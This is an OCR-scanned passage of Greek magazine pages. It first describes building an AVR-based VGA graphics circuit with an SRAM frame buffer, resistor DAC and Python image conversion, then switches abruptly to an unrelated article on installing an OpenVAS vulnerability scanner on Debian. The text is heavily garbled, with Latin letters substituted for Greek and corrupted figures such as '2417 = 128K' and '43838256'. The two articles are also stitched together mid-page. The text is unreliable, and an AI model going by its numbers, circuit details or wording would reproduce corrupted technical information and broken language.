ματα. Όπως ἐχουμε πει, η µἐγιστη συχνότητα µε την οποία μπορούν να αλλάζουν 
κατάσταση oi ακροδέκτες των AVR εἶναι τα 10MHz. H περἰοδος που αντιστοιχεἰ σε 
αυτή τη συχνότητα εἰναι τα 100nSec. Πα να εξασφαλίσουµε ὁτι η επικοινωνία των 
δύο τσιπ θα εξελίσσεται ομαλά, η μνήμη πρέπει να διαβάζει και να γράφει δεδοµένα 
σε λιγότερο ano 100nSec. Πα να βρούμε το κατάλληλο τσιπάκι καταφύγαμε στο 
Ebay’. Μετά ano μία προσεκτική αναζήτηση, εντοπἰσαµε και επιλέξαμε το τσιπάκι 
TC551001BPL-70 ano rnv Toshiba. Πρόκειται για µια μνήμη µε χωρητικότητα nou 
Φτάνει στα 128KB, διαθέτει παράλληλες εισόδους και εξόδους για τις διευθύνεις και 
τα δεδομένα, EVM ο χρόνος ανάγνωσης και εγγραφἠς φτάνει μόλις στα 70nSec. 


Το κύκλωμα 


Στο κἐντρο του κυκλώματος δεσπόζουν τα δύο τσιπ που αναφέραμε παραπάνω: O 
µικροελεγκτἠς και η μνήμη. Επειδἠ το τσιπάκι μνήμης nou επιλέξαμε διαθέτει 128KB, 
διαθέτει και 17 εισόδους διεύθυνσης (2417 = 128K). To δικὀ µας κύκλωμα ὁμως θα 
κάνει χρήση μόνο των 60KB. Ἐτσι, a&ionoirjoaue μόνο τις 16 εισόδους διεύθυν- 
σης (2316 = 64K), που αντιστοιχούν στα 16 λιγότερο σηµαντικά (less significant) 
ψηφία της διεύθυνσης. Αυτούς τους ακροδέκτες τους συνδέσαµε σε εκείνους του 
PORTC και Tou PORTA του μικροελεγκτή. Με τις συνδέσεις nou πραγματοποιήσαμε, 
το PORTC ελέγχει τα 8 λιγότερο σηµαντικἁἀ ψηφία της διεύθυνσης και το PORTA τα 
8 περισσότερο σηµαντικά (most significant). Θἐτοντας τις κατάλληλες τιμὲς στα 
δύο ports, ο μικροελεγκτἠς θα µπορεί να διαβάσει ἡ να γράψει οποιαδήποτε θέση 
μέσα στα 60KB που απαρτίζουν το frame buffer. Πα τη μεταφορὰ δεδομένων μετα- 
EU µικροελεγκτἠ και μνήμης επιλέξαμε το PORTD και συνδἐσαµε τους ακροδέκτες 


4. Πρὀκειται για μία μάλλον ανορθόδοξη κίνηση yia τα δεδοµένα ενός μηχανικού, αλλά στη δικἠ µας περίπτωση βοήθησε αρκετά ;) 
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Εικόνα 6 

Στη συνέχεια προσθἑσαµε τη βαθμίδα απομόνωσης και το δικτύωμα αντιστάσεων και 
διόδων, που λειτουργούν σαν DAC. Μαζί µε αυτά τα υποσυστήματα προσθέσαµε και 
το τµήµα rou data bus που συνδέει τη μνήμη µε τη βαθµίδα απομόνωσης. Eninpo- 
σθετα, σχηματίσαμε Kal Eva programming header (πάνω αριστερά), yia την εὐκολη 
µεταφορά των προγραμμάτων στον μικροελεγκτή. 


τους στα IO pins της μνήμης. Edm χρειάζεται λίγη προσοχή: Οι ακροδέκτες εισὀδου/ 
εξόδου της μνήμης δεν συνδέθηκαν µόνο σε αυτούς του PORTD. Συνδέθηκαν και 
στις εισόδους µιας βαθμίδας απομόνωσης (tri-state buffer)». lia va κατανοηθεἰ η 
χρησιμότητα αυτἠς της βαθμίδας, πρέπει πρὠτα να δούμε τη θέση της μέσα στο 
κύκλωμα. Οἱ ἐξοδοι αυτἠς της βαθμίδας συνδέονται σε Eva δικτύωμα αντιστάσεων, 
που λειτουργεἰὶ σαν μετατροπέας anó ψηφιακό σε αναλογικὀ. Περισσότερα για τον 
DAC θα πούμε αργότερα. Oi ἐξοδοι του μετατροπέα συνδέονται στο καλώδιο VGA 
και, συγκεκριµένα, στους ακροδέκτες που μεταφέρουν τη XPWHATIKN πληροφορία. 


Με τις παραπάνω συνδέσεις δημιουργείται Eva address bus των 16bits και Eva data 
bus των 8bits. To address bus συνδέει τα PORTC και PORTA µετις εισόδους διεύθυν- 
σης της μνήμης. To data bus συνδέει το PORTD µε τους ακροδέκτες εισόδου/εξόδου 
της μνήμης και *u£oo* της βαθμίδας απομόνωσης, µε rov DAC. H βαθμίδα anopo- 
νωσης χρησιμοποιείται για va αποκόπτει το τµήµα του data bus, που καταλήγει στον 
μετατροπέα. Βλέπετε, όταν ο μικροελεγκτἠς θέλει να διαβάσει ἡ να γράψει κάτι στη 
μνήμη, τα δεδομένα που διακινούνται στο data bus εἶναι άσχετα µε το σήμα VGA. 
Αν καταλήξουν στον DAC κι ano εκεἰ στην οθὀνη, θα προκληθεἰ σύγχυση και κατὰ 
πάσα πιθανότητα η οθὀνη θα "ξεκλειδώσει" aNd το σήμα! 


To address και το data bus αποτελούν το μεγαλύτερο μέρος του κυκλώματος. Κατά 
τα ἄλλα, το κύκλωμα εἶναι αρκετά απλὀ. Περιλαμβάνει συνδέσεις για την τροφοδο- 
oid των ολοκληρωμένων και απὀ ἐναν κεραμικὀ πυκνωτή των 100nF yia κάθε roin. 
Οι εν λόγω πυκνωτὲς ονομάζονται bypass capacitors, συνδέονται μεταξύ 5ν και 
GND και πρέπει να τοποθετούνται ὁσο πιο κοντὰ γίνεται στους ακροδέκτες τροφο- 
δοσίας του εκάστοτε ολοκληρωμένου. Μιλώντας απλά, η αποστολἠ των NUKVWTWV 


5. Για αυτή τη δουλειὰ επιλέξαμε το ολοκληρωμένο 74HC541. 
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εἶναι va "βραχυκυκλώνουν" και, µε αυτόν τον τρόπο, va karanviyouv τα παράσιτα 
που δημιουργούνται ano τη λειτουργία των ψηφιακών κυκλωμάτων σε µεγάλες συ- 
χνότητες. Τέλος, το κύκλωμα διαθέτει μερικὲς ακόµα συνδέσεις για τον ἐλεγχο των 
ολοκληρωμένων anó τον μικροελεγκτὴ, καθὼς και το σχηματισμὸὀ του σήματος VGA. 
Οι σχετικἐς συνδέσεις φαίνονται στον ακόλουθο nivaka: 


Ενεργοποίηση και απενεργοποίηση 
Chip Enable (RAM) μνήμης 


Πιστεύουμε ὁτι το περιεχόµενο του πἰνακα εἶναι σε γενικὲς γραμμὲς κατανοητὀ. 
Ωστόσο, ειδικἁ για την πρώτη γραμμή θα πρέπει να πούμε δυο λόγια παραπάνω. 
Όπως ἐχουμε πει, το frame buffer θα Exel μέγεθος 60KB. H μνήμη nou προµηθευ- 
τήκαμε, όμως, ἐχει χωρητικότητα 128KB. Αυτὀ σημαίνει OT! μπορεί να φιλοξενήσει 
δύο frame buffers! Κάτι τέτοιο θα ἦταν ιδιαίτερα εξυπηρετικὀ: O μικροελεγκτἠς θα 
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Εικόνα 7 

Προστέθηκε o ταλαντωτής στα 20MHz, µια πύλη NOT (74HCO04), καθώς και Ta 
καλώδια που μεταφέρουν ορισμένα σήματα ελέγχου. Δύο ano τα σήματα έχουν 
πάντα την αντίθετη τιµή. Αντί να δημιουργήσουμε και τα δύο EVTOG TOU κὠδι- 
κα, κάτι που θα οδηγούσε στη "σπατάλη" δύο ακροδεκτών TOU µικροελεγκτή, 
υλοποιήσαμε μόνο το Eva. Το ἄλλο παράγεται ue τη βοήθεια της πύλης NOT. 
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Εικόνα 8 
Ολόκληρο το κύκλωμα και µε ra τσιπάκια στη θέση τους! To μόνο που 
λείπει εἶναι η σύνδεση µε το καλώδιο VGA. 


μπορούσε να σχεδιάζει την επόμενη εικόνα στο Eva frame buffer και η οθὀνη va 
προβάλει τα περιεχόμενα του ἄλλου. Με auróv τον τρόπο οι εναλλαγές ano εικόνα 
σε εικὀνα θα ἐμοιαζαν ακαριαἰες και το "σπάσιμο" της εικὀνας (screen tearing) θα 
περιοριζόταν στο ελάχιστο. Ουσιαστικά, µε τη χρήση δύο frame buffers μπορούμε 
συγκαλύψουμετις αρνητικἐς συνέπειες που ἐχει η χαμηλή ταχύτητα ανανέωσης της 
εικόνας. Αυτή n τεχνικἠ ονομάζεται double buffering. Με τη σύνδεση που φαίνεται 
στην πρώτη γραμμή TOU Nivakd, αποκτάμε πρὀσβαση σε ὀλες τις εισόδους διεύ- 
θυνσης της μνήμης και ὀχι µόνο στις 16 που παρέχει To address bus. Ουσιαστικά, 
αποκτάµε πρὀσβαση σε OAN την ἑκταση της μνήμης και OX! μόνο στα πρὠτα 64KB. 
Ελέγχοντας το 170 bit της εισόδου διευθύνσεων, μπορούμε πλέον να σχηµατίσουµε 
ἑνα ακόµα frame buffer, που θα βρἰσκεται στο δεύτερο μισὸ της μνήμης (στα "άνω" 


64KB). 


8bits μοιρασμένα στα rpia;! 

Το ανανεωμένο κύκλωμα γραφικών θα µπορεί να απεικονίσει 256 SiaMmopeTika 
χρώματα. Έτσι, σκεπτὀμενοι σαν προγραμματιστὲἑς, αποφασἰσαµε αυτομάτως ὁτι 
για την περιγραφὴ του χρώματος αρκούν 8bits. Επομένως, για κάθε pixel θα ano- 
θηκεύουµε στο frame buffer ἑνα byte. Αυτή η σκέψη δεν ἦταν λανθασμένη, αλλὰ 
στην πορεία διαπιστώσαμε OT! δημιουργούσε Eva μικρὸ πρόβλημα. Βλέπετε, το 
σήμα VGA χρησιμοποιεί τρία επιµέρους σήματα yia την περιγραφή του χρώματος 
ενὸς pixel (red, green και blue). Πώς θα μοιράσουμε τα 8bits χρωματικής πληρο- 


φορίας στα τρία; 

H πρώτη λύση nou σκεφτήκαμε ἦταν να χρησιμοποιήσουμε διαφορετικὀ πλήθος 

bit yia Ka8e χρώμα. Πα παράδειγµα, θα μπορούσαμε να δεχτούμε ὁτι τα πρώτα 

δύο bits περιγράφουν την ένταση του κὀκκινου, τα επόμενα rpia bits την ἐνταση 

του πράσινου και ra τελευταἱα τρία την ἐνταση rou μπλε. Με αυτή τη διευθέτηση 

θα εἰχαμε 242=4 στάθμες yia το κὀκκινο, 2^3-8 στάθμες για το πράσινο και ἀλ- 
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λες τόσες για το μπλε. To πλήθος των συνδυασμών όλων αυτών των αποχρώσεων 
εἶναι ακριβώς 43838256. Σε auró το σενάριο, ο DAC θα μετέτρεπε ξεχωριστά τα 
πρώτα δύο bits και το προϊόν της µετατροπἠς θα οδηγούσε το σήμα για το KÒK- 
κινο. Ξεχωριστά θα μετατρέπονταν και oi δύο τριάδες bits, το αποτέλεσµα των 
οποίων θα οδηγούσε το πράσινο και To μπλε. Αυτή η λύση ἐμοιαζε αρκετά καλή, 
αλλά δημιουργούσε Eva ἆλλο πρόβλημα: Περιορἰζοντας την "ανάλυση" της μίας 
χρωματικἠς συνιστώσας, οι εικόνες θα αποκτούσαν συνολικά µια ελαφριά αλλά 
εντελὠς ανεπιθύμητη απόχρωση. Στο σενάριο nou περιγράψαμε, οι εικὀνες θα 
γίνονταν ελαφρώς γαλάζιες. 


Το παραπάνω πρὀβλημα μὰς ὠθησε να σκεφτούμε διαφορετικἀ: Κατ' αρχάς, ano- 
δώσαμε ισάριθμα bits σε κάθε χρωματική συνιστώσα και συγκεκριµένα ano δύο. 
Ἔτσι περἰσσεψαν άλλα δύο bits, τα οποία θεωρήσαμε OT! θα περιγράφουν τη φω- 
τεινότητα του χρώματος. Με αυτόν τον καταμερισμὀ εἶχαμε 4 διαβαθμίσεις για 
κάθε χρωματική συνιστώσα και 4 στάθμες για το χρώμα που περιγράφουν τα 
πρώτα €& bits! Το συγκεκριµένο χρωματικὀ μοντέλο, av και κάπως ιδιόμορφο, 
επιτρέπει να a&ionoirjooupe όλα τα διαθέσιµα bits, χωρίς να εισάγει κἄποια xpopa- 
τικἠ αλλοίωση. Δυστυχώς, ὅμως, περιπλἐκει την κατασκευή του DAC®. Μπορείτε 
να δείτε TO σχετικὀ κύκλωμα στην εικόνα 4. Τα πρῶτα έξι bits μοιράζονται σε τρεις 
επιµέρους DACs. Τα τελευταία δύο bits μετατρέπονται τρεις; φορὲς, απὀ τρεις 
ἘδιαφορετικούςΞ DAC. Καθεμία ano αυτὲς τις μετατροπὲς προστίθεται σε κἄποιο 
ano τα τρία χρώματα. Έτσι, τα δυο τελευταἰα bits επιδρούν στην ένταση των 
τριῶν XPWHATIKMV συνιστωσών. Κι επειδἠ η επίδραση σε κάθε συνιστώσα εἶναι 
πανομοιότυπη, τα τελευταία δύο bits ρυθμίζουν μόνο την φωτεινότητα χωρίς va 
αλλοιώνουν την απὀχρωση. Τέλος, σημειώστε ὁτι οι δίοδοι ἐχουν προστεθεί για 
να εξασφαλἰσουν την απομόνωση των τριῶν DAC. Μπορείτε να χρησιμοποιήσετε 
οποιεσδήποτε διόδους σήματος, ὅπως τις κλασικὲς 1N4148. Χωρίς αυτές, οι τάσεις 
για κἆθε χρωματική συνιστώσα θα βραχυκυκλώνονται μέσω των αντιστάσεων 
που απαρτίζουν τους DACs και όλα τα pixels θα αποκτούν µια διαβάθμιση του γκρι. 


Αν και η τελικἠ OWN του κυκλώματος εἶναι «τρομακτική», πρὀκειται yia Eva αρκετά 
απλὀ κύκλωμα. Με auró το σχόλιο βέβαια αναφερόμαστε στη λογικἠ του και OXI 
στην υλοποίηση. Αν αποφασίσετε να το κατασκευάσετε, θα χρειαστεἰ να ONAIOTEITE 
µε αρκετἠ υπομονή και να φανεἰτε ιδιαίτερα προσεκτικοί. O μεγαλύτερος ὀγκος της 
δουλειάς περιλαμβάνει συνδέσεις κι ὁπως καταλαβαίνετε εἶναι πολύ εὐκολο να yi- 
vouv λάθη. Εμεἰς το υλοποιήσαμε σε μία διάτρητη πλακέτα, γεγονὸς που σημαίνει OT! 
πραγματοποιήσαμε ατελείωτες κολλήσεις. To breadboard όμως δεν ενδείκνυται για 
ἑνα σύνθετο ψηφιακὸὀ κύκλωμα που λειτουργεί στα 20MHz. Τα δεκάδες καλωδιάκια 
θα λειτουργούν σαν μικρὲς κεραἰες και το περιβάλλον του κυκλώματος θα εἶναι εξαι- 
ρετικἀ θορυβώδες. AUTO θα επιδρἀ αρνητικἁ ἑως και καταστροφικἁ στο σήμα VGA. 


Κώδικας 


Kata τα γνωστὰ, πριν πούμε οτιδήποτε για τον κὠδικα, συνιστούμε να τον κατε- 
βάσετε και να rou ρἰξετε µια ματιά. Μπορείτε να πάρετε TO σχετικὀ πακέτο απὀ το 
http://bit.ly/dh@28vgagraphics. Το κύριο τμήμα rou κὠδικα βρίσκεται στο αρχείο 
vga-out.asm. Ano εκεἰ φορτώνονται όλα τα υπόλοιπα αρχεία, που περιλαμβάνουν 


6. Ουφ, δεν μπορούμε va τα έχουμε όλα δικἀ µας... 
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Εικόνα 9 

Mia ano τις πρώτες πετυχημένες δοκιμές! Σε εκείνο το στάδιο ο κώδικας ἦταν μισερὀς. 
Απουσίαζε ακόµα και η ρουτίνα αρχικοποίησης rou frame buffer. Τα "σκουπίδια" που 
εμφανίζονται στην οθόνη προέκυψαν απὀ τις τυχαίες τιμές που διαθέτει η μνήμη SRAM 
κατά την ενεργοποίησή της... 


διάφορες συναρτήσεις και πίνακες δεδομένων. H γενικἠ διάρθρωση του κὠδικα εἶναι 
πανομοιότυπη µε εκείνη της προηγούμενης ἐκδοσης: Το σήμα VGA παράγεται ano τη 
ρουτίνα εξυπηρέτησης ενός Interrupt. Στον υπόλοιπο χρόνο, ro πρὀγραμμα εκτελεὶ 
κάθε ἄλλη εργασία, ὁπως την εμφάνιση μηνυμάτων ἡ γραφικών, το "καθάρισμα" της 
εικὀνας κ.ά. Όλες αυτές οι εργασἰες πραγματοποιούνται στα δεδομένα nou διατηρεί 
το frame buffer. AUTO σημαίνει ότι το πρόγραµµα ενδέχεται να διαβάζει ἡ να γράφει 
στη μνήμη ava πάσα στιγμὴ. Έτσι, κάθε φορά που καλείται η ρουτίνα εξυπηρέτησης 
για TO σχηματισμὀ του σήματος VGA, ακολουθεἰ ra εξἠς βήματα: 


ο Αποθηκεύει την τρἐχουσα τιµή των PORTA και PORTC (τη διεύθυνση μνήμης 
στην οποία επενεργούσε o μικροελεγκτήἠς). 


ο Αποθηκεύει την τρέχουσα τιμὴ και την κατάσταση του PORTD (τα δεδομένα 
που μεταφέρει το data bus και τη "φορά" μετάδοσης). 


e Αποθηκεύει την τιµή του PORTB (όλα τα επιµέρους σήματα που καθορἰζουν την 
κατάσταση λειτουργίας των υπόλοιπων τσιπ). 


ο To PORTD μετατρέπεται σε εἰσοδο κι απενεργοποιούνται οι αντιστάσεις pull-up. 
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e Ενεργοποιεἰ τις εξόδους Tou tri-state buffer, ὠστε To data bus να συνδεθεί µε 
Ttov DAC. 


Ta πρώτα rpia βήματα εἶναι αναγκαία ὥστε, όταν τερματιστεί η ρουτίνα εξυπηρέτη- 
σης Tou Interrupt, να επανέλθουν οι δίαυλοι και όλα υποσυστήματα του κυκλώματος 
στην προηγοὐμενὴ τους κατάσταση. Τα τελευταία δύο βήματα "αποσυνδέουν" τον 
μικροελεγκτὴ and To data bus και συνδέουν το μετατροπέα. Ουσιαστικά, αυτά τα 
βήματα αποτελούν την απαραίτητη προετοιμασία για να ξεκινήσει η μετάδοση των 
δεδομένων ano τη μνήμη (ro frame buffer) προς την οθόνη. 


Ενσωμάτωση εικόνων 


Σε uia απὀ τις φωτογραφίες µε τις δοκιμές, θα δείτε την εμφάνιση ενός πολύ- 
XPWHOU γραφικού το οποίο θα μπορούσε να αποτελέσει και το λογότυπο της KA- 
τασκευἠς µας (deltaVGA). Όπως καταλαβαίνετε, πρὀκειται για μία εικὀνα που δεν 
παράγεται δυναμικά, αλλά εἶναι ενσωματωμένη (hardcoded) στο πρόγραμμα του 
HIKPOEAEYKTN. Το μόνο που κάνει o κὠδικας εἶναι να αντιγράψει τα δεδομένα 
της εικόνας απὀ τη μνήμη προγράμματος στο frame buffer. Αυτό εἶναι απλὀ και 
σίγουρα κατανοητὀ. Ωστόσο, οδηγεἰ αναπόφευκτα σε δύο ερωτήματα: Σε ποια 
μορφή μετατράπηκε η εικὀνα για να ενσωματωθεί στον κὠδικα; Πώς ἐγινε aurr| 
η μετατροπή; 


Για να περιορἰσουµε το φὀρτο εργασίας του (μάλλον αργόστροφου) κυκλώμα- 
τος γραφικών, η εικὀνα μετατράπηκε στη μορφὴ µε την οποία αποθηκεύονται ra 
περιεχόμενα του frame buffer. Έτσι, δημιουργήσαμε vav πίνακα αριθµητικὠν 
τιμών, καθεμία απὀ τις οποίες περιγράφει το χρώμα ενὸς pixel. Αυτὲς οι τιμὲς εἶναι 
κατασκευασμένες σύμφωνα HE το XYPWHATIKO πρότυπο nou περιγράψαμε παραπά- 
vw. Με άλλα λόγια, κάθε τιµή προέκυψε απὀ τη στάθμη για τις τρεις χρωματικὲς 
συνιστώσες, καθὼς και απὀ τη GUVOAIKN φωτεινότητα του εκάστοτε pixel. Πα την 
µετατροπἠ της εικόνας χρησιμοποιήσαμε την αγαπημένη µας Python. Ωστόσο, 
εἰχαμε φροντίσει ὥστε η εικόνα να βρίσκεται ἠδη σε BOAIKO φορμάτ. Συγκεκρι- 
μένα, αφού τη δημιουργήσαμε στο αγαπημένο µας σχεδιαστικὀ πρόγραμμα, την 
αποθηκεύσαμε σαν BMP και µε βάθος χρώματος ra 24bit. Έτσι, εξασφαλἰσαμε 
ότι το αρχείο της εικόνας θα περιλαμβάνει τρία bytes (Eva για κἆθε χρωματικἠ 
συνιστώσα) ava pixel. Στη συνέχεια εγκαταστήσαμε τη βιβλιοθήκη PIL (Python 
Imaging Library) και γράψαμε Tov κὠδικα που μπορείτε να κατεβάσετε απὀ το 
http://bit.ly/dh@28pixeldata. To πρὀγραμμὰ µας avoiyel μια εικόνα (η διαδρομή 
και το ὀνομα εἶναι "καρφωμένα" στον κὠδικα) και για κάθε pixel npayparonoiei 
τις ακόλουθες εργασίες: 


ο Κρατάει ra δύο περισσότερο σημαντικἁ bits ano την ένταση κάθε χρωματικής 
συνιστώσας (η εικόνα διατηρεἰ Eva byte για κάθε συνιστώσα, εξαιτίας του 
τρόπου αποθήκευσης). 


ο ΥΠΟλογἰζει τον μέσο OPO των τιμών για τις χρωματικὲς συνιστώσες, TOV οποίο 
θεωρεί αντιπροσωπευτικὀ της φωτεινότητας (ὁσο πιο μεγάλες οι τιμὲς για 
κάθε συνιστώσα, τόσο πιο "ανοιχτή" εἶναι η παραγόμενη απὀχρωση). 


e Τοποθετεί τα δύο bits yia το KOKKIVO στις πρώτες θέσεις ενὸς byte. Στη συνὲ- 
χεια τοποθετεί τα δύο bits για το πράσινο και αμέσως μετὰ τα δύο bits για To 
μπλε. Στο τέλος προσθέτει τα δύο περισσότερο σημαντικὰ bits, ano την τιμή 
της φωτεινότητας που υπολόγισε στο προηγούμενο βήμα. 
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Με aurr| τη λογική, το πρόγραµµα δημιουργεἰ vav πἰνακα µε δεδοµένα nou pno- 
ρούμε va αποθηκεύσουµε άμεσα στο frame buffer της κατασκευἠς. Μάλιστα, η 
Χρωματικἠ απόδοση της εικόνας ἦταν πάρα πολύ καλὴ και σε σχἐση µε αυτήν nou 
δημιουργήσαμε αρχικά, διέφερε µόνο αμυδρά! 


Εικόνα 10 

OI ατελείωτες δοκιμές του κώδικα διαδέχτηκαν τις ατελείωτες ώρες µε TO 
κολλητήρι, πάνω ano την πλακέτα. Όταν όμως εμφανίστηκε το λογότυπο της 
κατασκευής, η κούραση εξαφανίστηκε µονομιάς ;) 
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Ano τη στιγμή που έχουμε Eva box/VM µε το OpenVAS ρυθμισμένο ὠστε να δέχεται 
συνδέσεις τόσο απὀ τοπικούς OOO κι anó απομακρυσμένους clients, τότε, ασχέτως 
αν βρισκόμαστε στο ἰδιο τοπικὀ δίκτυο μ' aUTO ἡ óyi!, εἶναι δυνατόν να συνδεόµα- 
στε στον OpenVAS server, π.χ., απὀ τον web browser του laptop, και να ξεκινάμε 
vulnerability scans ἡ να παίρνουμε τ' αποτελἐσματα ano scans nou εἰχαμε non ξε- 
κινήσει. Εκτός ano την επικοινωνία µέσω web browser, υπάρχει και δυνατότητα 
απομακρυσμένης συνεργασίας µε ἄλλες εφαρμογἑς, ὁπως, π.χ., εἶναι το Metasploit. 
Αλλά περισσότερα επ' αυτού θα δούµε στο άρθρο που αρχίζει απὀ τη σελίδα 42. Δεν 
χρειάζεται να εἴμαστε επαγγελματίες στους τομεἰς της ασφάλειας ἡ του pen-testing, 
προκειµένου να εκτιμήσουμε τα οφέλη τέτοιων setups. Σκεφτείτε, N.X., ότι µια στο 
τόσο ἴσως θέλουμε να ελέγχουμε για αδυναμίες ἑνα σχολικὀ εργαστήριο ἠ/και το 
δίκτυο στο χώρο της εργασίας, χωρίς να βρισκόμαστε υποχρεωτικά εκεί. 


Ano τον επίσημο δικτυακὀ τόπο του OpenVAS διατίθεται Eva VM nou εἶναι ρυθµμισμὲ- 
νο ὥστε να AEITOUPYE! µε τον προαναφερθέντα rpóno (http://openvas.org/vm.html). 
To guest OS που τρέχει εἶναι το Debian 6.0.8 (Squeeze) κι εμεἰς το δοκιμάσαμε 
επιτυχώς σε περιβάλλον VirtualBox. Σας προτείνουμε va το κατεβάσετε κι εσεἰς, 
να nai&gre kai ν' αξιολογήσετε αν κάνει yia τα σενάρια χρήσης που ἐχετε κατὰ νου. 
Ακόμα καλύτερα, δείτε στο υπόλοιπο του ἄρθρου noc µπορείτε να στἠσετε το δικὀ 
σας box ἡ να δημιουργήσετε ro δικὀ σας virtual appliance, η αποστολἠ του οποίου, 
βεβαίως, θα 'vai va λειτουργεἰ ὡς OpenVAS server. Αλλά γιατὶ να µη χρησιμοποιή- 
σετε το επίσημο VM, ano το openvas.org; Τρεις εἶναι οι λόγοι που θα σας ἐκαναν να 
*unv* το προτιμήσετε: 


1. Έχετε ἑνα PC ἡ laptop που κάθεται και προτιμάτε να του βάλετε το λειτουργι- 
KO της αρεσκείας σας kai μετὰ το OpenVAS. H οδὸς Tou virtualization dev ἐχει 
νόημα για την περἰπτωσή σας. 


2. Ὁ εικονικὸς δίσκος του επίσημου VM εἶναι κάπως στενόχωρος (μόλις 868), 
οπότε αργότερα δεν θα 'vai εὐκολο να εγκαταστήσετε ὀποιο ἆλλο εργαλείο ἡ 
εφαρμογἠ θελήσετε. Μικρὸ το kako, βέβαια, µιας kai το VM εἶναι ειδικού σκο- 
πού — και τον OKONO αυτόν τον επιτελεἰ ἄριστα. 


3. Προτιμάτε ἆλλο λειτουργικὀ σύστημα ἡ ἄλλη ἐκδοση Tou Debian. Επίσης, 
θέλετε v' ασχοληθείτε σοβαρά µε ro OpenVAS, οπότε OKEMTEOTE Ori εἶναι 
απαραίτητο να δείτε τι χρειάζεται η εγκατἀστασὴ του αλλά και πὼς ακριβώς 
το ρυθµίζετε. Σωστά το OKEMTEOTE. 


Τι ακολουθεί 


Σε πολύ λἰγο θα δεἰξουµε noc ξεκινάμε µε µια λιτή εγκατάσταση rou Debian 7.3.0 
(Wheezy) —xwpic desktop, q(uoikà— και nog της εγκαθιστούµε το OpenVAS. AKo- 
λουθεἰ το σημαντικότερο στάδιο της εργασίας, το οποίο αφορἀ στη σωστή αρχικἠ 
ρύθμιση του OpenVAS αλλά και στη μέριμνα ώστε va EEkivd αυτόματα, κᾶθε φορά 
που εκκινεἰ TO λειτουργικὀ σύστημα. Πα τις ανάγκες του παρόντος δουλέψαμεσε £l- 
κονικὀ περιβάλλον, φτιάχνοντας στην ουσία Eva virtual appliance yia το VirtualBox. 
Το καλὸ μ' αυτή την προσέγγιση εἶναι ἑνας 100% φορητὸς OpenVAS server, ο οποίος 
µπορεί va κατοικεἰ σ' Eva οποιοδήποτε μηχάνημα που EXE! NON το λειτουργικό και τις 
εφαρμογές του — αρκεἰ βεβαίως να διαθέτει τους φυσικοὺς πόρους προκειµένου να 
σηκώσει (και) το VM. Περιττό πάντως να τονίσουμε or! µε τον ἴδιο ακριβώς τρόπο 
εργαζὀµαστε κι αν θέλουμε το OpenVAS "απευθείας" σε φυσικὀ υπολογιστή, χωρίς 


1. Ας εἶναι καλά To OpenVPN. 
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δηλαδἠ τη διαμεσολάβηση κάποιου hypervizor σαν το VirtualBox ἡ To ΡΓΟΧΜΟΧ VE 
(http://deltahacker.gr/deltacast-s01e08). Σε κάθε περίπτωση, καλὸ εἶναι ο υπολογι- 
στἠς —EIKOVIKOG ἡ φυσικός, δεν ἐχει σηµασία-- που τρέχει το OpenVAS, να διαθέτει 
τουλάχιστον 1GB μνήμης RAM. Φυσικά, ὁσο περισσότερη, τόσο το καλύτερο. 


Σηµείωση. ΣΤΟ http://openvas.org/install-packages.htmL υπάρχουν οδηγίες 
για την εγκατάσταση του OpenVAS σε διάφορες διανομὲς Tou Linux, δεκινώ- 
vrac ano binary packages. ΟΙ οδηγίες εἶναι IKAVONOINTIKEG, UNO την ἐννοια ότι 
δίνουν µια καλή εικόνα της όλης διαδικασίας. Στην πράξη, ὠστόσο, παρου- 
σιάζονται διάφορα προβλήματα για τα οποία δεν γίνεται κανένας λόγος στις 
επίσημες οδηγ/ες, ούτε φυσικά παρατίθενται λύσεις. Μετά απὀ αρκετούς NEI- 
ραματισμούς και ψάξιμο βρήκαμε τα aitia των προβλημάτων, όπως βεβαίως και 
τις λύσεις τους. Έτσι, οι οδηγίες που ακολουθούν στο παρὀν άρθρο διαφέρουν 
ano τις επίσημες, ὠὡστόσο TO τελικὀ αποτέλεσµα εἶναι ἑνας πλήρως λειτουργι- 
κὀς OpenVAS server yia ro Debian. Με παρόμοιο τρόπο θα δουλέψετε kai στην 
περίπτωση ἀλλης διανομής. 


[!!] Partition disks 
The installer can guide you through partitioning a disk (using different standard 
schemes) or, if you prefer, you can do it manually. With guided partitioning you will 
still have a chance later to review and customise the results. 


If you choose guided partitioning for an entire disk, you will next be asked which disk 
should be used. 


Partitioning method: 
Guided - use entire disk and set up LYM 
Guided - use entire disk and set up encrypted LVM 
Manual 


«Go Back» 


Πα Tov OpenVAS server που φτιάχνουμε, χρησιμοποιούμε ολόκληρο τον δίσκο rou box/ 
VM. Μια ενδιαφέρουσα δυνατότητα εἰναι η κρυπτογράφηση ολόκληρου του δίσκου, ώστε 
αν πέσει σε ξένα χέρια να µην μπορούν να διαβάσουν τα περιεχόμενά του. Το να συμβεί 
κάτι τέτοιο δεν εἰναι διόλου απίθανο, αφού το μηχάνημα µε το OpenVAS δεν βρίσκεται 
κατ’ ανάγκη σε δίκτυο που ελέγχουμε. 


Enter> activates buttons 


Λιτή εγκατάσταση Debian, σε poAo server 
Πα την εγκατάσταση rou Debian δεν ἐχουμε va πούμε πολλά, παρὰ va προσέξουμε 
μερικὰ σημεία μόνο. Κατεβάσαμε την ἐκδοση 7.3.0 και συγκεκριµένα την εκδοχἠ 
64bit: 
http: //cdimage.debian.org/debian-cd/7.3.0/amd64/iso-cd/debian-7.3.@-amd64- 
netinst.iso 
To image που επιλέξαμε ἐχει μικρὀ σχετικἁ μέγεθος και προορἰζεται yia δικτυακὲς 
εγκαταστάσεις. Κατά τη διάρκεια rou installation απαιτείται σύνδεση στο ἵντερνετ 
και μετὰ την ολοκλἠρωσή rou το σύστημα εἶναι πλήρως ενημερωμένο. Αντἰ για την 
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εκδοχἠ 32bit στραφήκαμε στην 64bit, µιας και θέλαμε να έχουμε την ευχέρεια ν' 
ανεβάζουμε τη μνήμη του VM ooo θέλουμε — ἡ τουλάχιστον 000 εἶναι εφικτὀ µε 
βάση τις δυνατότητες αλλά και τις ἄλλες εφαρμογὲς που τρἐχει το εκάστοτε host 
computer. Αναφορικά µε την απλἠ διαδικασία της εγκατάστασης, τρεις μόνο napa- 
τηρήσεις έχουμε να κάνουμε: 


Tab 


lia λόγους απλότητας, στο στάδιο του partitioning αφήσαμε την πρὠτη eni- 
Aoyn (Guided - use entire disk). Ενδιαφέρον πάντως ἐχει και η τρίτη (Guided 
- use enture disk and set up encrypted LVM): Σε περίπτωση nou θέλετε va 
διασφαλίσετε ότι ὁσο το box/VM εἶναι offline, πρόσβαση στον δίσκο της εγκα- 
τάστασης θα ἐχουν μόνον ὁσοι γνωρίζουν το αντίστοιχο password κρυπτογρά- 
